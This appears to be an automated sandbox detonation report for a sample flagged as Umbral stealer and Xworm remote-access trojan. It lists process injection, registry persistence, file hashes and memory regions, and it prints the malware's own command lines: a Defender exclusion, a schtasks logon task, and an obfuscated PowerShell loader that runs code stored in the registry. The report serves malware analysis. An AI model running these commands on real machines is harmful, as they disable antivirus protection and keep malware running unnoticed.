memory/376-133-0x0000000140000000-0x0000000140008000-memory.dmp

memory/376-140-0x00007FF8EA600000-0x00007FF8EA6BE000-memory.dmp

memory/376-139-0x00007FF8EC290000-0x00007FF8EC485000-memory.dmp

memory/376-138-0x0000000140000000-0x0000000140008000-memory.dmp

memory/376-132-0x0000000140000000-0x0000000140008000-memory.dmp

memory/376-131-0x0000000140000000-0x0000000140008000-memory.dmp

memory/612-152-0x0000019246950000-0x000001924697C000-memory.dmp

memory/612-153-0x00007FF8AC310000-0x00007FF8AC320000-memory.dmp

memory/672-164-0x00007FF8AC310000-0x00007FF8AC320000-memory.dmp

memory/968-175-0x00007FF8AC310000-0x00007FF8AC320000-memory.dmp

memory/384-186-0x00007FF8AC310000-0x00007FF8AC320000-memory.dmp

memory/384-185-0x000001D4EBFC0000-0x000001D4EBFEC000-memory.dmp

memory/384-179-0x000001D4EBFC0000-0x000001D4EBFEC000-memory.dmp

memory/700-190-0x000001939AD90000-0x000001939ADBC000-memory.dmp

memory/968-174-0x0000016AE51E0000-0x0000016AE520C000-memory.dmp

memory/968-168-0x0000016AE51E0000-0x0000016AE520C000-memory.dmp

memory/672-163-0x000001843AF50000-0x000001843AF7C000-memory.dmp

memory/672-157-0x000001843AF50000-0x000001843AF7C000-memory.dmp

memory/612-146-0x0000019246950000-0x000001924697C000-memory.dmp

memory/612-145-0x0000019246950000-0x000001924697C000-memory.dmp

memory/612-144-0x0000019246920000-0x0000019246946000-memory.dmp

memory/376-141-0x0000000140000000-0x0000000140008000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c3a6928331590eb8c571ec8699fe4d14
SHA1 23a32d273b2e86e8f73b01b9934742589995d3cb
SHA256 a8bd4e37730df218360b07df233d48d06baddd36b6a54999b40cdf769367e9d7
SHA512 72ce1cadca87a3088d7ba3d94727b6945ef52e8b1064a44414b4d5a18650aa750ec7f183844f559980e08155a5de4a3d3ab5aebf878698aee466e21f1964e8e0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 db6e0181ee27d7f1ce5859e2ad04d3dc
SHA1 a4d49da3e66ee7793b96b99d3a2d023e3b1b1687
SHA256 409903c85c510f853755fd3488eac3459133871fdea8f7a11edd1afbfaea34f7
SHA512 06c3cb5811155fbdae919c23a093f17e8266a23a5312c26c14a601e45abb659c563be8bb28fc626619607cd6e721e3161d83b4450ef6622f75a916de62b8af9a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a2c8179aaa149c0b9791b73ce44c04d1
SHA1 703361b0d43ec7f669304e7c0ffbbfdeb1e484ff
SHA256 c1d30342a40a2b6e7553da30ceb85754d33820f6fbb3bbbed1ceb30d6390de4a
SHA512 2e201dd457d055baad86f68c15bcc7beb48d6dc2ffc10db7f304eb93f697e7b45991cbde857d25da2c9c60c23f3e13df8b5ed5809c1753737a23096e296cc9e3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5fbb56518e82d1b1e5ef6be3b6693880
SHA1 4e7671d0193b6f640d81b3fb91ac17ca67e0632b
SHA256 760d5623e712e53485c80330b3e2567577ffcf9397a94c3085bd1999f4650a40
SHA512 ff2fff83f094820da4157c907be06039dcc58b1a23e867ba58c0c3f40d8bbd90022161dc3d77c082a765f7f4104f683be995b994183d1899c73bd9131fe614d1

memory/3184-1019-0x00007FF8CDFD0000-0x00007FF8CEA91000-memory.dmp

memory/3312-1053-0x00007FF8CDFD0000-0x00007FF8CEA91000-memory.dmp

memory/1808-1068-0x0000000000AE0000-0x0000000000AF0000-memory.dmp

memory/3312-1078-0x00007FF8CDFD0000-0x00007FF8CEA91000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

memory/1680-1101-0x0000000000890000-0x00000000008A0000-memory.dmp

memory/3424-1126-0x0000000000F30000-0x0000000000F40000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-09 01:14

Reported

2024-07-09 01:16

Platform

win7-20240705-en

Max time kernel

149s

Max time network

16s

Command Line

winlogon.exe

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies security service

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP C:\Windows\System32\svchost.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection C:\Windows\System32\svchost.exe N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2600 created 432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Umbral

stealer umbral

Xworm

trojan rat xworm

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Software\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\ProgramData\\www.DeadSec0000000000-obfusecator.exe" C:\Users\Admin\AppData\Local\Temp\rootkit.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2600 set thread context of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = a0d0bc599dd1da01 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1988 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 1988 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 1988 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 1988 wrote to memory of 780 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 1988 wrote to memory of 780 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 1988 wrote to memory of 780 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 1988 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1988 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1988 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1988 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 1988 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 1988 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 1988 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 1988 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 1988 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 1988 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 2240 wrote to memory of 2600 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2240 wrote to memory of 2600 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2240 wrote to memory of 2600 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2600 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2600 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2600 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2600 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2600 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2600 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2600 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2600 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2600 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2340 wrote to memory of 432 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 2340 wrote to memory of 480 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\services.exe
PID 2340 wrote to memory of 488 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 2340 wrote to memory of 496 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsm.exe
PID 2340 wrote to memory of 612 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2340 wrote to memory of 692 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2340 wrote to memory of 772 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2340 wrote to memory of 820 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 612 wrote to memory of 448 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 612 wrote to memory of 448 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 612 wrote to memory of 448 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 2340 wrote to memory of 448 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 2340 wrote to memory of 864 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2340 wrote to memory of 976 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2340 wrote to memory of 284 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2340 wrote to memory of 492 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 2340 wrote to memory of 1040 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2340 wrote to memory of 1120 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\taskhost.exe
PID 2340 wrote to memory of 1188 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\Dwm.exe
PID 2340 wrote to memory of 1252 N/A C:\Windows\System32\dllhost.exe C:\Windows\Explorer.EXE
PID 2340 wrote to memory of 1404 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe
PID 2340 wrote to memory of 1736 N/A C:\Windows\System32\dllhost.exe C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
PID 2340 wrote to memory of 832 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 2340 wrote to memory of 2560 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2340 wrote to memory of 1924 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\sppsvc.exe
PID 2340 wrote to memory of 2976 N/A C:\Windows\System32\dllhost.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 2340 wrote to memory of 780 N/A C:\Windows\System32\dllhost.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 2340 wrote to memory of 2240 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\taskeng.exe
PID 2340 wrote to memory of 2600 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2340 wrote to memory of 2596 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\conhost.exe
PID 2340 wrote to memory of 448 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\wbem\wmiprvse.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\services.exe

C:\Windows\system32\services.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

C:\Windows\system32\sppsvc.exe

C:\Windows\system32\sppsvc.exe

C:\Users\Admin\AppData\Local\Temp\rootkit.exe

"C:\Users\Admin\AppData\Local\Temp\rootkit.exe"

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

"C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"

C:\Users\Admin\AppData\Local\Temp\Modify.exe

"C:\Users\Admin\AppData\Local\Temp\Modify.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

"C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {98CBFCCB-028E-4AA4-944D-BD5B9581CD23} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+'T'+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](119)+''+[Char](119)+''+[Char](119)+'st'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-5051511122106885354-846861541234880637129283130861032109-929670289-1544716396"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{ba3e326a-1696-43fe-90a8-83710c76090d}

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp

Files

memory/1988-0-0x000007FEF59C3000-0x000007FEF59C4000-memory.dmp

memory/1988-1-0x0000000001060000-0x00000000010AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

MD5 737b2d60dc5d475685b65f5c288e00c0
SHA1 144ba7647d8609abe4aab74d4f191e2c594dd55a
SHA256 69c3458a319518d10939633f7421eb833c8c9c904f989f0ef75a572a59a1f084
SHA512 96a22774e1b5c22d9d4114a8f22f1f75cf2edc5970442e1b1e5eabfc70a922d3f4a5e5d8c93150f50ef3da45b241745f861f1d00b306c11707097495b84ecee6

memory/2976-10-0x00000000010A0000-0x00000000010B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Modify.exe

MD5 9259d8aef8f52e8ff4fa082c0074c9b0
SHA1 88abb68a5632812be3c18e0c740e3818d9501b3e
SHA256 45d4033eeaa6aa420a644c3eb2d0ef659320c9a13e22d1d16930c807847203db
SHA512 9cb06d4026a53208e80865cdb21d79e40d418518a168680537cafa08f1c295094238014ba35c2b7794a773ac2dc480b01cf5811d5b1e60bf911d7a6d03985ede

memory/1988-16-0x000007FEF59C0000-0x000007FEF63AC000-memory.dmp

memory/780-15-0x0000000000DE0000-0x0000000000E20000-memory.dmp

memory/2976-17-0x000007FEF59C0000-0x000007FEF63AC000-memory.dmp

memory/2248-22-0x000000001B580000-0x000000001B862000-memory.dmp

memory/2248-23-0x0000000002000000-0x0000000002008000-memory.dmp

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

MD5 22d120454dd38d7f1a3f1cd0eb497f95
SHA1 4c11a082bf8e64b21310b959821a9f7324aa8107
SHA256 6fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c
SHA512 1552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9

memory/1988-30-0x000007FEF59C0000-0x000007FEF63AC000-memory.dmp

memory/2600-32-0x0000000000A10000-0x0000000000A18000-memory.dmp

memory/2600-31-0x0000000019E40000-0x000000001A122000-memory.dmp

memory/2600-33-0x0000000001520000-0x000000000154A000-memory.dmp

memory/2600-35-0x0000000077400000-0x000000007751F000-memory.dmp

memory/2600-34-0x0000000077620000-0x00000000777C9000-memory.dmp

memory/2340-36-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2340-37-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2340-39-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2340-38-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2340-41-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2340-43-0x0000000077400000-0x000000007751F000-memory.dmp

memory/432-50-0x0000000000CA0000-0x0000000000CCC000-memory.dmp

memory/432-49-0x0000000000BF0000-0x0000000000C16000-memory.dmp

memory/432-47-0x0000000000BF0000-0x0000000000C16000-memory.dmp

memory/2340-44-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2340-42-0x0000000077620000-0x00000000777C9000-memory.dmp

memory/432-59-0x0000000037660000-0x0000000037670000-memory.dmp

memory/480-71-0x00000000000C0000-0x00000000000EC000-memory.dmp

memory/488-87-0x0000000037660000-0x0000000037670000-memory.dmp

memory/496-93-0x00000000008E0000-0x000000000090C000-memory.dmp

memory/488-86-0x000007FEBE640000-0x000007FEBE650000-memory.dmp

memory/488-85-0x0000000000240000-0x000000000026C000-memory.dmp

memory/488-79-0x0000000000240000-0x000000000026C000-memory.dmp

memory/480-73-0x0000000037660000-0x0000000037670000-memory.dmp

memory/480-72-0x000007FEBE640000-0x000007FEBE650000-memory.dmp

memory/480-65-0x00000000000C0000-0x00000000000EC000-memory.dmp

memory/432-58-0x000007FEBE640000-0x000007FEBE650000-memory.dmp

memory/432-57-0x0000000000CA0000-0x0000000000CCC000-memory.dmp

memory/432-51-0x0000000000CA0000-0x0000000000CCC000-memory.dmp

memory/2976-221-0x000007FEF59C0000-0x000007FEF63AC000-memory.dmp